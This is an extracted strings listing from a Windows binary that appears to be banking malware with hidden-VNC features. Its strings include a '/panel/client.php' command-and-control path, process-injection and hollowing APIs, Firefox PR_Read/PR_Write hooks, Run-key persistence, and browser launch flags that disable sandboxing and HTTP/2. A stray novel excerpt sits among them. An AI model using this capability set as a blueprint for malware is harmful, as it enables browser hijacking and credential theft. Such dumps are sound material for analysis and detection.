!This program cannot be run in DOS mode.
`.rdata
@.data
@.reloc
[Shl3A
[Shx9A
j=h,@A
jChPCA
j;h$DA
VWWWhH1@
PVVj%V
PVVVVVV
PWWWWWWW
WVRQPS
XSQVWf
VSVVVW
PSSSSSS
PSSSSSS
PSSSSSS
PQQQQQQ
PSSSSSS
PSSSSSS
jCZSSSS
URPQQh
;t$,v-
UQPXY]Y[
t#Vh,UA
zSSSSj
f9:t!V
QQSVj8j@
PPPPPPPP
PPPPPWS
PP9E u:PPVWP
127.0.0.1
/panel/client.php
User32.dll
Kernel32.dll
KernelBase.dll
msvcrt.dll
ntdll.dll
Shlwapi.dll
Shell32.dll
Secur32.dll
Advapi32.dll
ws2_32.dll
version.dll
Psapi.dll
wininet.dll
gdi32.dll
MessageBoxA
GetWindowsDirectoryA
WideCharToMultiByte
LocalAlloc
wsprintfA
MultiByteToWideChar
malloc
VirtualAllocEx
WriteProcessMemory
CreateRemoteThread
LoadLibraryA
GetProcAddress
PathRemoveFileSpecA
GetModuleFileNameA
PathFindFileNameA
strncmp
_strnicmp
lstrlenA
ExitProcess
SHGetFolderPathA
lstrcpyA
lstrcatA
CopyFileA
GetVolumeInformationA
GetUserNameExA
LookupAccountNameA
ConvertSidToStringSidA
LocalFree
lstrcmpiA
lstrcmpA
StrStrA
StrStrIA
strtol
realloc
WSAStartup
socket
gethostbyname
connect
closesocket
WSACleanup
memset
memcpy
NtOpenKey
NtSetValueKey
CloseHandle
CreateProcessA
NtCreateThreadEx
TerminateProcess
FindWindowA
NtUnmapViewOfSection
NtQueryInformationProcess
GetThreadContext
SetThreadContext
SHFileOperationA
FindFirstFileA
FindNextFileA
GetWindowThreadProcessId
InitializeCriticalSection
GetLastError
EnterCriticalSection
LeaveCriticalSection
_errno
tolower
isdigit
strtoul
isxdigit
strtod
CreateToolhelp32Snapshot
Process32First
Process32Next
StrChrA
StrToIntA
GetModuleHandleA
GetFileVersionInfoSizeA
GetFileVersionInfoA
VerQueryValueA
GetModuleInformation
memcmp
ExpandEnvironmentStringsA
GetPrivateProfileSectionNamesA
GetPrivateProfileStringA
CreateFileA
ReadFile
WriteFile
RegSetValueExA
RegOpenKeyExA
RegCloseKey
GetFileSize
ResumeThread
IsWow64Process
GetNativeSystemInfo
OpenProcess
CreateThread
GetUserNameW
GetComputerNameW
GetVersionExA
CreateNamedPipeA
ConnectNamedPipe
DisconnectNamedPipe
InternetCrackUrlA
GetTempPathA
GetTempFileNameA
ShellExecuteA
ioctlsocket
CreateMutexA
ReleaseMutex
WaitForSingleObject
EnumWindows
GetCurrentProcessId
DeleteFileA
PathFileExistsA
CreateDirectoryA
HttpQueryInfoA
HttpQueryInfoW
RtlCompressBuffer
RtlGetCompressionWorkSpaceSize
SetThreadDesktop
CreateDesktopA
OpenDesktopA
TerminateThread
PostMessageA
SendMessageA
ChildWindowFromPoint
ScreenToClient
MoveWindow
GetWindowRect
GetMenuItemID
MenuItemFromPoint
RealGetWindowClassA
PtInRect
GetWindowPlacement
SetWindowLongA
GetWindowLongA
WindowFromPoint
SHAppBarMessage
RegQueryValueExA
GetDesktopWindow
DeleteDC
ReleaseDC
DeleteObject
GetDIBits
StretchBlt
SetStretchBltMode
SelectObject
CreateCompatibleDC
CreateCompatibleBitmap
IsWindowVisible
GetWindow
PrintWindow
GetTopWindow
RtlInitAnsiString
RtlAnsiStringToUnicodeString
LdrLoadDll
LdrGetProcedureAddress
RtlFreeUnicodeString
RtlCreateUserThread
Hello World
HTTP/1.1
Host:
Pragma: no-cache
Content-type: text/html
Connection: close
Content-Length:
HTTP/1.1 200 OK
Content-Length
Transfer-Encoding
chunked
\Registry\User\%s\%s
Software\Microsoft\Windows\CurrentVersion\Run
dllhost.exe
bin|int32
bin|int64
explorer.exe
firefox.exe
chrome.exe
iexplore.exe
powershell -noexit -command "[console]::windowwidth = 100;[console]::windowheight = 30; [console]::bufferwidth = [console]::windowwidth"
msedge.exe
brave.exe
injects
Firefox
Chrome
Internet Explorer
chrome.dll
BitBlt
nss3.dll
nspr4.dll
PR_Read
PR_Write
.rdata
Content-Length:
Accept-Encoding
identity
Connection
Content-Type:
text/html
Location:
X-HeyThere: 5eYEp80n3hM
Host:
http(s)://
log|%s|%s|%d|
<!DOCTYPE
<script>window.location.href = window.location.href;</script>
InternetCloseHandle
InternetQueryDataAvailable
HttpOpenRequestW
InternetConnectW
HttpSendRequestW
InternetReadFile
InternetReadFileExW
InternetWriteFile
%appdata%
%s\%s\%s\%s.ini
Mozilla
Profiles
Profile
%s\%s\%s\%s\%s\%s.js
network.http.spdy.enabled
browser.tabs.remote.autostart
user_pref("network.http.spdy.enabled.v3-1", false);
user_pref("network.http.spdy.enabled.v3", false);
user_pref("network.http.spdy.enabled", false);
user_pref("browser.tabs.remote.autostart", false);
user_pref("browser.tabs.remote.autostart.2", false);
user_pref("gfx.direct2d.disabled", true);
user_pref("layers.acceleration.disabled", true);
Software\Microsoft\Internet Explorer\Main
TabProcGrowth
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
--disable-http2 --use-spdy=off --disable-quic
CreateProcessInternalW
NoProtectedModeBanner
#32768
\rundll32.exe shell32.dll,#61
Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
TaskbarGlomLevel
profiles.ini
-profile
\Google\Chrome\
cmd.exe /c start
--no-sandbox --disable-3d-apis --disable-gpu --disable-d3d11 --user-data-dir=
User Data\
\Mozilla\Firefox\
IsRelative=
-no-remote -profile
info|%d|%d|%s|%s|%d|%d
\\.\pipe\%s
As we walked along the flatblock marina, I was calm on the outside, but thinking all the time. So now it was to be Georgie the general, saying what we should do and what not to do, and Dim as his mindless greeding bulldog. But suddenly I viddied that thinking was for the gloopy ones and that the oomny ones use, like, inspiration and what Bog sends. For now it was lovely music that came to my aid. There was a window open with the stereo on and I viddied right at once what to do.
Shell_TrayWnd
verclsid.exe
child.dll
:Zone.Identifier
Trusteer
hVNC_Rules
Button
%08lX%04lX%lu
ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789
Unknown exception
bad array new length
?456789:;<=
!"#$%&'()*+,-./0123
invalid string position
string too long
bad allocation
__based(
__cdecl
__pascal
__stdcall
__thiscall
__fastcall
__vectorcall
__clrcall
__eabi
__swift_1
__swift_2
__ptr64
__restrict
__unaligned
restrict(
delete
operator
`vftable'
`vbtable'
`vcall'
`typeof'
`local static guard'
`string'
`vbase destructor'
`vector deleting destructor'
`default constructor closure'
`scalar deleting destructor'
`vector constructor iterator'
`vector destructor iterator'
`vector vbase constructor iterator'
`virtual displacement map'
`eh vector constructor iterator'
`eh vector destructor iterator'
`eh vector vbase constructor iterator'
`copy constructor closure'
`udt returning'
`local vftable'
`local vftable constructor closure'
new[]
delete[]
`omni callsig'
`placement delete closure'
`placement delete[] closure'
`managed vector constructor iterator'
`managed vector destructor iterator'
`eh vector copy constructor iterator'
`eh vector vbase copy constructor iterator'
`dynamic initializer for '
`dynamic atexit destructor for '
`vector copy constructor iterator'
`vector vbase copy constructor iterator'
`managed vector copy constructor iterator'
`local static thread guard'
operator ""
operator co_await
operator<=>
Type Descriptor'
Base Class Descriptor at (
Base Class Array'
Class Hierarchy Descriptor'
Complete Object Locator'
`anonymous namespace'
FlsAlloc
FlsFree
FlsGetValue
FlsSetValue
InitializeCriticalSectionEx
CorExitProcess
AreFileApisANSI
CompareStringEx
LCMapStringEx
LocaleNameToLCID
AppPolicyGetProcessTerminationMethod
Sunday
Monday
Tuesday
Wednesday
Thursday
Friday
Saturday
January
February
August
September
October
November
December
MM/dd/yy
dddd, MMMM dd, yyyy
HH:mm:ss
!"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
!"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~
?5Wg4p
%S#[k =
"B <1=
_hypot
_nextafter
.text$di
.text$mn
.text$yd
.idata$5
.00cfg
.CRT$XCA
.CRT$XCAA
.CRT$XCU
.CRT$XCZ
.CRT$XIA
.CRT$XIAA
.CRT$XIAC
.CRT$XIC
.CRT$XIZ
.CRT$XPA
.CRT$XPX
.CRT$XPXA
.CRT$XPZ
.CRT$XTA
.CRT$XTZ
.rdata
.rdata$r
.rdata$sxdata
.rdata$zzzdbg
.rtc$IAA
.rtc$IZZ
.rtc$TAA
.rtc$TZZ
.xdata$x
.idata$2
.idata$3
.idata$4
.idata$6
.data$r
.rsrc$01
.rsrc$02
GetProcAddress
LoadLibraryA
CreateFileA
GetFileSize
ReadFile
CloseHandle
TerminateProcess
OpenProcess
lstrcatA
CreateToolhelp32Snapshot
Process32First
Process32Next
EnterCriticalSection
LeaveCriticalSection
WaitForSingleObject
GetConsoleWindow
KERNEL32.dll
ShowWindow
USER32.dll
UnhandledExceptionFilter
SetUnhandledExceptionFilter
GetCurrentProcess
IsProcessorFeaturePresent
IsDebuggerPresent
GetStartupInfoW
GetModuleHandleW
QueryPerformanceCounter
GetCurrentProcessId
GetCurrentThreadId
GetSystemTimeAsFileTime
InitializeSListHead
RaiseException
GetLastError
SetLastError
DeleteCriticalSection
RtlUnwind
InitializeCriticalSectionAndSpinCount
TlsAlloc
TlsGetValue
TlsSetValue
TlsFree
FreeLibrary
LoadLibraryExW
ExitProcess
GetModuleHandleExW
GetModuleFileNameW
GetStdHandle
WriteFile
GetCommandLineA
GetCommandLineW
HeapAlloc
HeapFree
FindClose
FindFirstFileExW
FindNextFileW
IsValidCodePage
GetACP
GetOEMCP
GetCPInfo
MultiByteToWideChar
WideCharToMultiByte
GetEnvironmentStringsW
FreeEnvironmentStringsW
SetEnvironmentVariableW
CompareStringW
LCMapStringW
GetProcessHeap
GetFileType
SetStdHandle
GetStringTypeW
HeapSize
HeapReAlloc
FlushFileBuffers
GetConsoleCP
GetConsoleMode
SetFilePointerEx
CreateFileW
WriteConsoleW
DecodePointer
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
.?AVbad_array_new_length@std@@
.?AVbad_alloc@std@@
.?AVexception@std@@
.?AVtype_info@@
.?AVlogic_error@std@@
.?AVlength_error@std@@
.?AVout_of_range@std@@
<?xml version='1.0' encoding='UTF-8' standalone='yes'?>
<assembly xmlns='urn:schemas-microsoft-com:asm.v1' manifestVersion='1.0'>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
<security>
<requestedPrivileges>
<requestedExecutionLevel level='asInvoker' uiAccess='false' />
</requestedPrivileges>
</security>
</trustInfo>
</assembly>
040?0G0L0Z0_0k0p0~0
1'1,181=1J1P1Z1a1m1r1}1
2(2-292>2L2Q2^2e2q2v2
3!3-323>3C3O3T3_3d3q3x3
4#4/444@4E4Q4V4b4g4s4x4
5"5'53585B5H5T5Y5e5j5v5{5
6!6(63686D6I6T6Y6e6j6v6{6
7$7)767=7H7M7Y7^7j7o7{7
8&8+868;8H8O8[8`8l8q8}8
9(9/9:9?9J9O9\9c9o9t9
:*:/:;:@:L:Q:]:b:o:u:
;*;/;;;@;L;Q;\;a;m;r;
<!<-<2<><C<O<T<`<e<q<v<
=&=,=8===I=N=Z=_=k=p=|=
> >,>1>>>D>O>T>`>e>q>v>
? ?%?1?6?<?B?N?S?`?i?w?|?
0"0'03080D0I0U0Z0e0j0u0z0
1 1+101<1A1M1R1^1c1o1t1
2#20272B2G2Q2X2c2h2t2y2
3 3%34393F3M3Y3^3j3o3{3
4"4(41474@4F4N4T4]4c4l4r4z4
5 5$5.54595@5F5K5T5Z5_5h5n5s5|5
6#6,62676@6F6K6T6Z6_6h6n6s6z6
7%7+70777=7F7L7R7W7^7d7i7p7v7{7
8!8*80858>8D8I8R8X8]8f8l8q8z8
9"9(9-969<9A9J9P9U9^9d9i9r9x9}9
:#:(:/:5:::A:G:L:S:Y:^:e:k:t:z:
;";';.;4;9;@;F;K;R;X;];d;j;o;v;|;
<!<'<-<2<;<A<F<O<U<Z<c<i<n<w<|<
=#=)=2=8=>=C=J=P=U=\=b=g=p=v={=
>$>*>/>6><>A>H>N>S>Z>`>e>l>r>w>
?!?(?.?3?:?@?E?L?R?W?^?d?i?p?v?{?
0"0)0/040;0A0F0Q0V0a0f0q0v0
1,1O1a1i1{1
2+222:2A2H2S2w2
3#3>3M3d3s3
4,4`4i4s4|4
5"5'545=5C5K5T5_5f5p5w5
5$6H6Q6_6e6k6q6
7>7T7m7
888a8u8
969<9I9O9\9
;+;Y;h;w;
<"<8<O<Y<i<
?"?*?2?:?@?F?L?R?X?^?d?m?s?y?
0*040;0`0p0|0
0'1C1u1{1
2=2D2J2W2]2j2o2|2
2)30363C3I3V3
40464C4]4v4
5+5I5Z5
6B6O6V6o6~6
6'7P7l7
9%9.989X9
:(:;:E:y:
0(050H0q0
4o526H6
=I=O=U=[=q=z=
> >(>->3>=>G>W>g>w>
0$060@0
202E2J2O2p2u2
5;5D5M5[5d5
8+8e8n8{8
9 929]9
:F:f:(;X;
;D;W;u;
;1=h=o=t=x=|=
> >$>(>,>
637g7o7
9"90969Q9y9
: :?:M:T:Z:
<H<_<m<y<
=.=3=8=S=`=i=n=s=
>">'>H>X>l>u>
0.1`1q1|1
2 282S2^2
3G4Z4c4p4
6.6@6O6
9,:3:Q;
<2<7<A<F<Q<\<i<w<
0F0[0f0n0y0
1%1,141L1Z1b1z1
1?2K2P2V2[2c2i2q2
4O5W5^5e6
: :,:E:^:|:
;&;O;d;v;
<=<D<O<]<d<j<
9+9:9D9Q9[9k9
<)=2=6=<=@=F=J=T=g=p=
385>5L5[5 6$6)696>6C6S6X6]6m6r6w6
7.7Z7c7
969E9P9U9Z9x9
:*:N:e:j:u:
:&;X;s;
<"=Z=r=
>m>r>w>|>
343C3Q3]3i3w3
4%4;4O4
5N5]5k5
707B7T7f7x7
4v5;6h6
>&?O?z?
8 8R8o8
;2;H;U;Z;h;
<M=_=q=
:*:0:>:q:
;/<4<y<
<!=-=A=M=Y=y=
> >+>:>M?~?
3&3{3|4
4-585>5G5
6#6l6u6~6
8-9L9}9
<$<:<P<X<
@1H1L1X1\1`1d1h1t1x1|1
: :(:0:8:@:H:P:X:`:h:p:x:
; ;(;0;8;@;H;P;X;`;h;p;x;
< <(<0<8<@<H<P<X<`<h<p<x<
= =(=0=8=
`3d3h3@5H5P5T5X5\5`5d5h5l5t5x5|5
5(7,70747h7l7p7t7x7|7
= =$=(=,=0=4=8=<=@=L=P=T=X=\=`=d=h=l=p=t=x=|=
d7l7t7|7
8$8,848<8D8L8T8\8d8l8t8|8
9$9,949<9D9L9T9\9d9l9t9|9
:$:,:4:<:D:L:T:\:d:l:t:|:
;$;,;4;<;D;L;T;\;d;l;t;|;
<$<,<4<<<D<L<T<\<d<l<t<|<
=$=,=4=<=D=L=T=\=d=l=t=|=
>$>,>4><>D>L>T>\>d>l>t>|>
9 9(90989@9H9P9X9`9h9p9x9
: :(:0:8:@:H:P:X:`:h:p:x:
; ;(;0;8;@;H;P;X;`;h;p;x;
< <(<0<8<@<H<P<X<`<h<p<x<
= =(=0=8=@=H=P=X=`=h=p=x=
> >(>0>8>@>H>P>X>`>h>p>x>
? ?(?0?8?@?H?P?X?`?h?p?x?
3$3,343<3D3L3T3\3d3l3t3|3
4H5L5\5`5h5
6,606@6D6L6d6t6x6
7$7(7,70787P7t:|:
; ;(;0;8;<;D;X;`;h;p;t;x;
<,<0<P<p<
=0=P=p=
>0>P>p>
?0?L?P?
6$6(6,6H6L6
7 7$7074787<7@7D7H7L7
Aapi-ms-win-core-fibers-l1-1-1
api-ms-win-core-synch-l1-2-0
kernel32
api-ms-
mscoree.dll
Aja-JP
Aapi-ms-win-core-datetime-l1-1-1
api-ms-win-core-file-l1-2-2
api-ms-win-core-localization-l1-2-1
api-ms-win-core-localization-obsolete-l1-2-0
api-ms-win-core-processthreads-l1-1-2
api-ms-win-core-string-l1-1-0
api-ms-win-core-sysinfo-l1-2-1
api-ms-win-core-winrt-l1-1-0
api-ms-win-core-xstate-l2-1-0
api-ms-win-rtcore-ntuser-window-l1-1-0
api-ms-win-security-systemfunctions-l1-1-0
ext-ms-win-ntuser-dialogbox-l1-1-0
ext-ms-win-ntuser-windowstation-l1-1-0
advapi32
api-ms-win-appmodel-runtime-l1-1-2
user32
ext-ms-
Sunday
Monday
Tuesday
Wednesday
Thursday
Friday
Saturday
January
February
August
September
October
November
December
MM/dd/yy
dddd, MMMM dd, yyyy
HH:mm:ss
((((( H
zh-CHS
az-AZ-Latn
uz-UZ-Latn
kok-IN
syr-SY
div-MV
quz-BO
sr-SP-Latn
az-AZ-Cyrl
uz-UZ-Cyrl
quz-EC
sr-SP-Cyrl
quz-PE
smj-NO
bs-BA-Latn
smj-SE
sr-BA-Latn
sma-NO
sr-BA-Cyrl
sma-SE
sms-FI
smn-FI
zh-CHT
az-az-cyrl
az-az-latn
bs-ba-latn
div-mv
kok-in
quz-bo
quz-ec
quz-pe
sma-no
sma-se
smj-no
smj-se
smn-fi
sms-fi
sr-ba-cyrl
sr-ba-latn
sr-sp-cyrl
sr-sp-latn
syr-sy
uz-uz-cyrl
uz-uz-latn
zh-chs
zh-cht
CONOUT$